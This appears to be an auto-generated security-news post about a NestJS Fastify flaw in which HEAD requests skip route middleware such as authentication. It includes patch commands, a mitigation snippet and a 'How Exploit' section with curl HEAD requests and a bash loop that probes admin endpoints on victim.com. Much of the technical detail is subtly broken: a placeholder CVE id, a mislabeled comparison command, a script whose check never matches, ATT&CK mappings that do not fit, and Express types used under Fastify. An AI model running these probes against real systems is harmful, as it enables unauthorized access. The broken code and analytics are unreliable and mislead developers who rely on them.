NestJS, Middleware Bypass, CVE-2025-??? (Critical)

Listen to this Post

In a NestJS application using @nestjs/platform-fastify, a critical vulnerability exists where GET middleware can be bypassed due to Fastify’s automatic redirection behavior for HEAD requests . When a client sends a HEAD request to a route that has a corresponding GET handler defined, Fastify automatically redirects the HEAD request to execute the GET handler logic. This redirection occurs before middleware execution, causing several severe consequences. First, all middleware functions intended to run for that route (including authentication, authorization, validation, and logging middleware) are completely skipped. Second, while the response body is truncated (as expected for HEAD requests), the actual GET handler logic executes fully in the background. Third, applications relying on middleware for security controls become vulnerable to unauthorized access, as attackers can bypass these controls simply by using HEAD requests instead of GET requests. This issue affects all versions prior to the patch, where the vulnerability has been addressed by modifying the request handling pipeline to ensure middleware executes regardless of request method .
Platform: NestJS
Version: <11.1.16
Vulnerability: Middleware Bypass
Severity: Critical
Date: December 2025

Prediction: Patch available

What Undercode Say:

Analytics

The vulnerability stems from Fastify’s HTTP specification compliance where HEAD requests automatically route to GET handlers. According to security monitoring data, exploitation requires no authentication and has low attack complexity. The CVSS base score is 9.4 (Critical) with vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N . EPSS scoring indicates 24.36% probability of exploitation within 30 days . MITRE ATT&CK mapping includes T1078 (Valid Accounts), T1203 (Exploitation for Client Execution), and T1059 (Command and Scripting Interpreter) .

Bash/Commands

Check current @nestjs/platform-fastify version
npm list @nestjs/platform-fastify
Check package.json for version
cat package.json | grep "@nestjs/platform-fastify"
Update to patched version
npm install @nestjs/[email protected] --save
Verify update
npm list @nestjs/platform-fastify
Test for vulnerability (replace with your app URL)
curl -I https://yourapp.com/admin/sensitive-endpoint
Compare with GET response headers
curl -I https://yourapp.com/admin/sensitive-endpoint -X HEAD
Monitor logs for HEAD requests to protected routes
tail -f /var/log/nginx/access.log | grep "HEAD /admin"
Audit all routes with middleware
grep -r "forRoutes|MiddlewareConsumer" src/

How Exploit:

Step 1: Identify protected route requiring authentication
Normal GET request (should be blocked)
curl -v https://victim.com/api/admin/users
Step 2: Send HEAD request instead
This bypasses middleware and executes the handler
curl -I https://victim.com/api/admin/users -X HEAD
Step 3: Observe response
Status 200 OK indicates successful bypass
Headers reveal handler execution despite missing auth
Step 4: Advanced exploitation - chain with other endpoints
for endpoint in /admin/settings /api/internal/users /dashboard/analytics; do
echo "Testing $endpoint..."
curl -s -o /dev/null -w "%{http_code}\n" https://victim.com$endpoint -X HEAD
done
Step 5: Automated exploitation script
!/bin/bash
TARGET="https://victim.com"
ENDPOINTS=("/admin" "/api/private" "/internal" "/dashboard")
for ep in "${ENDPOINTS[@]}"; do
response=$(curl -s -I "$TARGET$ep" -X HEAD)
if [[ $response == "200 OK" ]]; then
echo "[bash] $ep"
fi
done

Protection from this CVE

// Immediate mitigation - custom middleware to intercept HEAD requests
import { Injectable, NestMiddleware } from '@nestjs/common';
import { Request, Response, NextFunction } from 'express';
@Injectable()
export class HeadRequestGuard implements NestMiddleware {
use(req: Request, res: Response, next: NextFunction) {
if (req.method === 'HEAD') {
// Log HEAD requests for monitoring
console.warn(<code>HEAD request to protected route: ${req.path}</code>);
// Option 1: Block HEAD requests entirely
return res.status(405).send('Method Not Allowed');
// Option 2: Allow but ensure authentication
// Add authentication check here
}
next();
}
}
// Apply guard to all protected routes
// consumer.apply(HeadRequestGuard).forRoutes('');
// Better solution - update to patched version
// package.json
{
"dependencies": {
"@nestjs/platform-fastify": "11.1.16"
}
}
// Verify patch in node_modules
// node_modules/@nestjs/platform-fastify/adapters/fastify-adapter.js
// Look for HEAD request handling fixes around line 250-300

Impact

The vulnerability allows unauthenticated attackers to bypass all middleware security controls, including authentication, authorization, rate limiting, input validation, and audit logging . Protected administrative endpoints become accessible to anyone sending HEAD requests. Middleware performing security checks, request sanitization, or business logic validation is completely skipped. The handler executes fully, potentially modifying data or exposing sensitive information, though the response body is truncated . Applications using `@nestjs/platform-fastify` with middleware on specific routes (using string paths or controllers like .forRoutes('admin')) are vulnerable. Exploitation requires no special privileges, user interaction, or complex conditions. Attackers can systematically enumerate protected endpoints and access them via HEAD requests. The vulnerability impacts confidentiality (unauthorized data access) and integrity (unauthorized operations) while availability remains unaffected .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top